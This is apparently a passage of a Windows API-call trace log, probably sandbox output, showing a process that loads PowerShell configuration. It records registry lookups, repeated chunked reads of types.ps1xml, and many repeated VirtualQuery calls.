	[0088.523] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e818 | out: phkResult=0x14e818*=0x2d0) returned 0x0
	[0088.523] RegQueryValueExW (in: hKey=0x2d0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e860, lpData=0x0, lpcbData=0x14e85c*=0x0 | out: lpType=0x14e860*=0x1, lpData=0x0, lpcbData=0x14e85c*=0x56) returned 0x0
	[0088.523] RegQueryValueExW (in: hKey=0x2d0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e860, lpData=0x361778, lpcbData=0x14e85c*=0x56 | out: lpType=0x14e860*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14e85c*=0x56) returned 0x0
	[0088.523] RegCloseKey (hKey=0x2d0) returned 0x0
	[0088.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x14e3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0088.523] GetLastError () returned 0x0
	[0088.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x14e354, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0088.523] GetLastError () returned 0x0
	[0088.550] GetSystemInfo (in: lpSystemInfo=0x14df98 | out: lpSystemInfo=0x14df98*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0088.550] VirtualQuery (in: lpAddress=0x14d754, lpBuffer=0x14e754, dwLength=0x1c | out: lpBuffer=0x14e754*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.557] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x14e32c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0088.557] GetLastError () returned 0x0
	[0088.557] SetErrorMode (uMode=0x1) returned 0x1
	[0088.557] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2d0
	[0088.557] GetLastError () returned 0x0
	[0088.557] GetFileType (hFile=0x2d0) returned 0x1
	[0088.557] SetErrorMode (uMode=0x1) returned 0x1
	[0088.557] GetFileType (hFile=0x2d0) returned 0x1
	[0088.557] ReadFile (in: hFile=0x2d0, lpBuffer=0x1416374, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e894, lpOverlapped=0x0 | out: lpBuffer=0x1416374*, lpNumberOfBytesRead=0x14e894*=0x1000, lpOverlapped=0x0) returned 1
	[0088.558] GetLastError () returned 0x0
	[0088.558] ReadFile (in: hFile=0x2d0, lpBuffer=0x1416374, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e894, lpOverlapped=0x0 | out: lpBuffer=0x1416374*, lpNumberOfBytesRead=0x14e894*=0x1000, lpOverlapped=0x0) returned 1
	[0088.558] GetLastError () returned 0x0
	[0088.559] ReadFile (in: hFile=0x2d0, lpBuffer=0x1416374, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e894, lpOverlapped=0x0 | out: lpBuffer=0x1416374*, lpNumberOfBytesRead=0x14e894*=0x1000, lpOverlapped=0x0) returned 1
	[0088.559] GetLastError () returned 0x0
	[0088.559] ReadFile (in: hFile=0x2d0, lpBuffer=0x1416374, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e894, lpOverlapped=0x0 | out: lpBuffer=0x1416374*, lpNumberOfBytesRead=0x14e894*=0x1000, lpOverlapped=0x0) returned 1
	[0088.559] GetLastError () returned 0x0
	[0088.560] ReadFile (in: hFile=0x2d0, lpBuffer=0x1416374, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e894, lpOverlapped=0x0 | out: lpBuffer=0x1416374*, lpNumberOfBytesRead=0x14e894*=0x1000, lpOverlapped=0x0) returned 1
	[0088.560] GetLastError () returned 0x0
	[0088.561] ReadFile (in: hFile=0x2d0, lpBuffer=0x1416374, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e894, lpOverlapped=0x0 | out: lpBuffer=0x1416374*, lpNumberOfBytesRead=0x14e894*=0x1000, lpOverlapped=0x0) returned 1
	[0088.561] GetLastError () returned 0x0
	[0088.561] ReadFile (in: hFile=0x2d0, lpBuffer=0x1416374, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e894, lpOverlapped=0x0 | out: lpBuffer=0x1416374*, lpNumberOfBytesRead=0x14e894*=0x1000, lpOverlapped=0x0) returned 1
	[0088.561] GetLastError () returned 0x0
	[0088.561] ReadFile (in: hFile=0x2d0, lpBuffer=0x1416374, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e894, lpOverlapped=0x0 | out: lpBuffer=0x1416374*, lpNumberOfBytesRead=0x14e894*=0x1000, lpOverlapped=0x0) returned 1
	[0088.561] GetLastError () returned 0x0
	[0088.561] ReadFile (in: hFile=0x2d0, lpBuffer=0x1416374, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e894, lpOverlapped=0x0 | out: lpBuffer=0x1416374*, lpNumberOfBytesRead=0x14e894*=0x1000, lpOverlapped=0x0) returned 1
	[0088.561] GetLastError () returned 0x0
	[0088.562] ReadFile (in: hFile=0x2d0, lpBuffer=0x1416374, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e894, lpOverlapped=0x0 | out: lpBuffer=0x1416374*, lpNumberOfBytesRead=0x14e894*=0x1000, lpOverlapped=0x0) returned 1
	[0088.562] GetLastError () returned 0x0
	[0088.562] ReadFile (in: hFile=0x2d0, lpBuffer=0x1416374, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e894, lpOverlapped=0x0 | out: lpBuffer=0x1416374*, lpNumberOfBytesRead=0x14e894*=0x1000, lpOverlapped=0x0) returned 1
	[0088.563] GetLastError () returned 0x0
	[0088.563] ReadFile (in: hFile=0x2d0, lpBuffer=0x1416374, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e894, lpOverlapped=0x0 | out: lpBuffer=0x1416374*, lpNumberOfBytesRead=0x14e894*=0x1000, lpOverlapped=0x0) returned 1
	[0088.563] GetLastError () returned 0x0
	[0088.563] ReadFile (in: hFile=0x2d0, lpBuffer=0x1416374, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e894, lpOverlapped=0x0 | out: lpBuffer=0x1416374*, lpNumberOfBytesRead=0x14e894*=0x1000, lpOverlapped=0x0) returned 1
	[0088.563] GetLastError () returned 0x0
	[0088.563] ReadFile (in: hFile=0x2d0, lpBuffer=0x1416374, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e894, lpOverlapped=0x0 | out: lpBuffer=0x1416374*, lpNumberOfBytesRead=0x14e894*=0x1000, lpOverlapped=0x0) returned 1
	[0088.563] GetLastError () returned 0x0
	[0088.563] ReadFile (in: hFile=0x2d0, lpBuffer=0x1416374, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e894, lpOverlapped=0x0 | out: lpBuffer=0x1416374*, lpNumberOfBytesRead=0x14e894*=0x1000, lpOverlapped=0x0) returned 1
	[0088.563] GetLastError () returned 0x0
	[0088.564] ReadFile (in: hFile=0x2d0, lpBuffer=0x1416374, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e894, lpOverlapped=0x0 | out: lpBuffer=0x1416374*, lpNumberOfBytesRead=0x14e894*=0x1000, lpOverlapped=0x0) returned 1
	[0088.564] GetLastError () returned 0x0
	[0088.564] ReadFile (in: hFile=0x2d0, lpBuffer=0x1416374, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e894, lpOverlapped=0x0 | out: lpBuffer=0x1416374*, lpNumberOfBytesRead=0x14e894*=0x1000, lpOverlapped=0x0) returned 1
	[0088.564] GetLastError () returned 0x0
	[0088.566] ReadFile (in: hFile=0x2d0, lpBuffer=0x1416374, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e894, lpOverlapped=0x0 | out: lpBuffer=0x1416374*, lpNumberOfBytesRead=0x14e894*=0x1000, lpOverlapped=0x0) returned 1
	[0088.566] GetLastError () returned 0x0
	[0088.566] ReadFile (in: hFile=0x2d0, lpBuffer=0x1416374, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e894, lpOverlapped=0x0 | out: lpBuffer=0x1416374*, lpNumberOfBytesRead=0x14e894*=0x1000, lpOverlapped=0x0) returned 1
	[0088.566] GetLastError () returned 0x0
	[0088.567] ReadFile (in: hFile=0x2d0, lpBuffer=0x1416374, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e894, lpOverlapped=0x0 | out: lpBuffer=0x1416374*, lpNumberOfBytesRead=0x14e894*=0x1000, lpOverlapped=0x0) returned 1
	[0088.567] GetLastError () returned 0x0
	[0088.567] ReadFile (in: hFile=0x2d0, lpBuffer=0x1416374, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e894, lpOverlapped=0x0 | out: lpBuffer=0x1416374*, lpNumberOfBytesRead=0x14e894*=0x1000, lpOverlapped=0x0) returned 1
	[0088.567] GetLastError () returned 0x0
	[0088.567] ReadFile (in: hFile=0x2d0, lpBuffer=0x1416374, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e894, lpOverlapped=0x0 | out: lpBuffer=0x1416374*, lpNumberOfBytesRead=0x14e894*=0x1000, lpOverlapped=0x0) returned 1
	[0088.567] GetLastError () returned 0x0
	[0088.568] ReadFile (in: hFile=0x2d0, lpBuffer=0x1416374, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e894, lpOverlapped=0x0 | out: lpBuffer=0x1416374*, lpNumberOfBytesRead=0x14e894*=0x1000, lpOverlapped=0x0) returned 1
	[0088.568] GetLastError () returned 0x0
	[0088.568] ReadFile (in: hFile=0x2d0, lpBuffer=0x1416374, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e894, lpOverlapped=0x0 | out: lpBuffer=0x1416374*, lpNumberOfBytesRead=0x14e894*=0x1000, lpOverlapped=0x0) returned 1
	[0088.568] GetLastError () returned 0x0
	[0088.568] ReadFile (in: hFile=0x2d0, lpBuffer=0x1416374, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e894, lpOverlapped=0x0 | out: lpBuffer=0x1416374*, lpNumberOfBytesRead=0x14e894*=0x1000, lpOverlapped=0x0) returned 1
	[0088.568] GetLastError () returned 0x0
	[0088.568] ReadFile (in: hFile=0x2d0, lpBuffer=0x1416374, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e894, lpOverlapped=0x0 | out: lpBuffer=0x1416374*, lpNumberOfBytesRead=0x14e894*=0x1000, lpOverlapped=0x0) returned 1
	[0088.568] GetLastError () returned 0x0
	[0088.568] ReadFile (in: hFile=0x2d0, lpBuffer=0x1416374, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e894, lpOverlapped=0x0 | out: lpBuffer=0x1416374*, lpNumberOfBytesRead=0x14e894*=0x1000, lpOverlapped=0x0) returned 1
	[0088.569] GetLastError () returned 0x0
	[0088.569] ReadFile (in: hFile=0x2d0, lpBuffer=0x1416374, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e894, lpOverlapped=0x0 | out: lpBuffer=0x1416374*, lpNumberOfBytesRead=0x14e894*=0x1000, lpOverlapped=0x0) returned 1
	[0088.569] GetLastError () returned 0x0
	[0088.569] ReadFile (in: hFile=0x2d0, lpBuffer=0x1416374, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e894, lpOverlapped=0x0 | out: lpBuffer=0x1416374*, lpNumberOfBytesRead=0x14e894*=0x1000, lpOverlapped=0x0) returned 1
	[0088.569] GetLastError () returned 0x0
	[0088.569] ReadFile (in: hFile=0x2d0, lpBuffer=0x1416374, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e894, lpOverlapped=0x0 | out: lpBuffer=0x1416374*, lpNumberOfBytesRead=0x14e894*=0x1000, lpOverlapped=0x0) returned 1
	[0088.569] GetLastError () returned 0x0
	[0088.569] ReadFile (in: hFile=0x2d0, lpBuffer=0x1416374, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e894, lpOverlapped=0x0 | out: lpBuffer=0x1416374*, lpNumberOfBytesRead=0x14e894*=0x1000, lpOverlapped=0x0) returned 1
	[0088.569] GetLastError () returned 0x0
	[0088.570] ReadFile (in: hFile=0x2d0, lpBuffer=0x1416374, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e894, lpOverlapped=0x0 | out: lpBuffer=0x1416374*, lpNumberOfBytesRead=0x14e894*=0x1000, lpOverlapped=0x0) returned 1
	[0088.570] GetLastError () returned 0x0
	[0088.570] ReadFile (in: hFile=0x2d0, lpBuffer=0x1416374, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e894, lpOverlapped=0x0 | out: lpBuffer=0x1416374*, lpNumberOfBytesRead=0x14e894*=0x1000, lpOverlapped=0x0) returned 1
	[0088.570] GetLastError () returned 0x0
	[0088.574] ReadFile (in: hFile=0x2d0, lpBuffer=0x1416374, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e894, lpOverlapped=0x0 | out: lpBuffer=0x1416374*, lpNumberOfBytesRead=0x14e894*=0x1000, lpOverlapped=0x0) returned 1
	[0088.574] GetLastError () returned 0x0
	[0088.574] ReadFile (in: hFile=0x2d0, lpBuffer=0x1416374, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e894, lpOverlapped=0x0 | out: lpBuffer=0x1416374*, lpNumberOfBytesRead=0x14e894*=0x1000, lpOverlapped=0x0) returned 1
	[0088.574] GetLastError () returned 0x0
	[0088.574] ReadFile (in: hFile=0x2d0, lpBuffer=0x1416374, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e894, lpOverlapped=0x0 | out: lpBuffer=0x1416374*, lpNumberOfBytesRead=0x14e894*=0x1000, lpOverlapped=0x0) returned 1
	[0088.574] GetLastError () returned 0x0
	[0088.575] ReadFile (in: hFile=0x2d0, lpBuffer=0x1416374, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e894, lpOverlapped=0x0 | out: lpBuffer=0x1416374*, lpNumberOfBytesRead=0x14e894*=0x1000, lpOverlapped=0x0) returned 1
	[0088.575] GetLastError () returned 0x0
	[0088.575] ReadFile (in: hFile=0x2d0, lpBuffer=0x1416374, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e894, lpOverlapped=0x0 | out: lpBuffer=0x1416374*, lpNumberOfBytesRead=0x14e894*=0x1000, lpOverlapped=0x0) returned 1
	[0088.575] GetLastError () returned 0x0
	[0088.575] ReadFile (in: hFile=0x2d0, lpBuffer=0x1416374, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e894, lpOverlapped=0x0 | out: lpBuffer=0x1416374*, lpNumberOfBytesRead=0x14e894*=0x1000, lpOverlapped=0x0) returned 1
	[0088.575] GetLastError () returned 0x0
	[0088.575] ReadFile (in: hFile=0x2d0, lpBuffer=0x1416374, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e894, lpOverlapped=0x0 | out: lpBuffer=0x1416374*, lpNumberOfBytesRead=0x14e894*=0x1000, lpOverlapped=0x0) returned 1
	[0088.575] GetLastError () returned 0x0
	[0088.575] ReadFile (in: hFile=0x2d0, lpBuffer=0x1416374, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e894, lpOverlapped=0x0 | out: lpBuffer=0x1416374*, lpNumberOfBytesRead=0x14e894*=0x1000, lpOverlapped=0x0) returned 1
	[0088.575] GetLastError () returned 0x0
	[0088.576] ReadFile (in: hFile=0x2d0, lpBuffer=0x1416374, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e894, lpOverlapped=0x0 | out: lpBuffer=0x1416374*, lpNumberOfBytesRead=0x14e894*=0x1b4, lpOverlapped=0x0) returned 1
	[0088.576] GetLastError () returned 0x0
	[0088.576] ReadFile (in: hFile=0x2d0, lpBuffer=0x1416374, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e894, lpOverlapped=0x0 | out: lpBuffer=0x1416374*, lpNumberOfBytesRead=0x14e894*=0x0, lpOverlapped=0x0) returned 1
	[0088.576] GetLastError () returned 0x0
	[0088.576] CloseHandle (hObject=0x2d0) returned 1
	[0088.576] GetLastError () returned 0x0
	[0088.576] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x14e3f4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0088.576] GetLastError () returned 0x0
	[0088.576] SetErrorMode (uMode=0x1) returned 0x1
	[0088.576] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1436c04 | out: lpFileInformation=0x1436c04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7c2d31c, ftCreationTime.dwHighDateTime=0x1c9ea11, ftLastAccessTime.dwLowDateTime=0xd7c2d31c, ftLastAccessTime.dwHighDateTime=0x1c9ea11, ftLastWriteTime.dwLowDateTime=0xd7c5347c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0088.576] GetLastError () returned 0x0
	[0088.576] SetErrorMode (uMode=0x1) returned 0x1
	[0088.576] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x14e3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0088.576] GetLastError () returned 0x0
	[0088.576] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e818 | out: phkResult=0x14e818*=0x2d0) returned 0x0
	[0088.576] RegQueryValueExW (in: hKey=0x2d0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e860, lpData=0x0, lpcbData=0x14e85c*=0x0 | out: lpType=0x14e860*=0x1, lpData=0x0, lpcbData=0x14e85c*=0x56) returned 0x0
	[0088.576] RegQueryValueExW (in: hKey=0x2d0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e860, lpData=0x361778, lpcbData=0x14e85c*=0x56 | out: lpType=0x14e860*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14e85c*=0x56) returned 0x0
	[0088.577] RegCloseKey (hKey=0x2d0) returned 0x0
	[0088.577] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x14e3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0088.577] GetLastError () returned 0x0
	[0088.577] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x14e354, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0088.577] GetLastError () returned 0x0
	[0088.694] VirtualQuery (in: lpAddress=0x14d754, lpBuffer=0x14e754, dwLength=0x1c | out: lpBuffer=0x14e754*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.697] VirtualQuery (in: lpAddress=0x14d754, lpBuffer=0x14e754, dwLength=0x1c | out: lpBuffer=0x14e754*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.699] VirtualQuery (in: lpAddress=0x14d754, lpBuffer=0x14e754, dwLength=0x1c | out: lpBuffer=0x14e754*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.699] VirtualQuery (in: lpAddress=0x14d754, lpBuffer=0x14e754, dwLength=0x1c | out: lpBuffer=0x14e754*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.699] VirtualQuery (in: lpAddress=0x14d754, lpBuffer=0x14e754, dwLength=0x1c | out: lpBuffer=0x14e754*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.699] VirtualQuery (in: lpAddress=0x14d754, lpBuffer=0x14e754, dwLength=0x1c | out: lpBuffer=0x14e754*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.700] VirtualQuery (in: lpAddress=0x14d754, lpBuffer=0x14e754, dwLength=0x1c | out: lpBuffer=0x14e754*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.701] VirtualQuery (in: lpAddress=0x14d754, lpBuffer=0x14e754, dwLength=0x1c | out: lpBuffer=0x14e754*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.707] VirtualQuery (in: lpAddress=0x14d754, lpBuffer=0x14e754, dwLength=0x1c | out: lpBuffer=0x14e754*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.707] VirtualQuery (in: lpAddress=0x14d754, lpBuffer=0x14e754, dwLength=0x1c | out: lpBuffer=0x14e754*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.708] VirtualQuery (in: lpAddress=0x14d754, lpBuffer=0x14e754, dwLength=0x1c | out: lpBuffer=0x14e754*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.708] VirtualQuery (in: lpAddress=0x14d754, lpBuffer=0x14e754, dwLength=0x1c | out: lpBuffer=0x14e754*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.708] VirtualQuery (in: lpAddress=0x14d754, lpBuffer=0x14e754, dwLength=0x1c | out: lpBuffer=0x14e754*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.708] VirtualQuery (in: lpAddress=0x14d754, lpBuffer=0x14e754, dwLength=0x1c | out: lpBuffer=0x14e754*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.709] VirtualQuery (in: lpAddress=0x14d754, lpBuffer=0x14e754, dwLength=0x1c | out: lpBuffer=0x14e754*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.709] VirtualQuery (in: lpAddress=0x14d754, lpBuffer=0x14e754, dwLength=0x1c | out: lpBuffer=0x14e754*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.713] VirtualQuery (in: lpAddress=0x14d754, lpBuffer=0x14e754, dwLength=0x1c | out: lpBuffer=0x14e754*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.715] VirtualQuery (in: lpAddress=0x14d754, lpBuffer=0x14e754, dwLength=0x1c | out: lpBuffer=0x14e754*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.715] VirtualQuery (in: lpAddress=0x14d754, lpBuffer=0x14e754, dwLength=0x1c | out: lpBuffer=0x14e754*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.716] VirtualQuery (in: lpAddress=0x14d754, lpBuffer=0x14e754, dwLength=0x1c | out: lpBuffer=0x14e754*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.716] VirtualQuery (in: lpAddress=0x14d754, lpBuffer=0x14e754, dwLength=0x1c | out: lpBuffer=0x14e754*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.717] VirtualQuery (in: lpAddress=0x14d754, lpBuffer=0x14e754, dwLength=0x1c | out: lpBuffer=0x14e754*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.717] VirtualQuery (in: lpAddress=0x14d754, lpBuffer=0x14e754, dwLength=0x1c | out: lpBuffer=0x14e754*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.718] VirtualQuery (in: lpAddress=0x14d754, lpBuffer=0x14e754, dwLength=0x1c | out: lpBuffer=0x14e754*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.718] VirtualQuery (in: lpAddress=0x14d754, lpBuffer=0x14e754, dwLength=0x1c | out: lpBuffer=0x14e754*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.718] VirtualQuery (in: lpAddress=0x14d754, lpBuffer=0x14e754, dwLength=0x1c | out: lpBuffer=0x14e754*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.719] VirtualQuery (in: lpAddress=0x14d754, lpBuffer=0x14e754, dwLength=0x1c | out: lpBuffer=0x14e754*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.719] VirtualQuery (in: lpAddress=0x14d754, lpBuffer=0x14e754, dwLength=0x1c | out: lpBuffer=0x14e754*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.719] VirtualQuery (in: lpAddress=0x14d754, lpBuffer=0x14e754, dwLength=0x1c | out: lpBuffer=0x14e754*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
